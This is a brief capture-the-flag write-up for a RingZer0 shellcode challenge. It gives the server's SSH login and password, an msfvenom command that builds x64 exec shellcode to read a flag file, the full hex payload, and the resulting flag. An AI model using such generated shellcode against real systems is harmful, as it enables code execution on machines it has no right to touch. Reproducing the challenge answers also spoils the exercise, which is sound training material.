
Connect to the server (password is 50g8O1R0C42nP7N):

    ssh level1@shellcode.ringzer0team.com -p 7771

Because there are no restrictions for the shell code, I have used the most simple way available - msfvenom tool.
With this tool I was able to create payload that executes command "/bin/cat /flag/level1.flag". 

    msfvenom -b '\x00' -p linux/x64/exec CMD="/bin/cat /flag/level1.flag" | hexdump -ve '1/1 "\\\x%.2x"'

Created payload is:

\x48\x31\xc9\x48\x81\xe9\xf7\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xd1\xae\x3a\x31\xbd\x47\xb0\xd6\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xbb\x95\x62\xa8\xf5\xfc\x9f\xb4\xb8\xc0\x15\x42\xd5\x47\xe3\x9e\x58\x49\x52\x1c\xde\x47\xb0\x9e\x58\x48\x68\xd9\xa6\x47\xb0\xd6\xfe\xcc\x53\x5f\x92\x24\xd1\xa2\xf1\x81\x5c\x5d\xdc\x20\x9f\xba\xb4\xd8\x5f\x5d\x8c\x69\xd6\xba\xb0\xc9\x3a\x67\xea\x0f\x39\x30\xde\xab\x3a\x31\xbd\x47\xb0\xd6

The flag was printed after executing this payload on server.

The flag is:

FLAG-1Ql864uTj8pY2470t85VX42q1B 
 
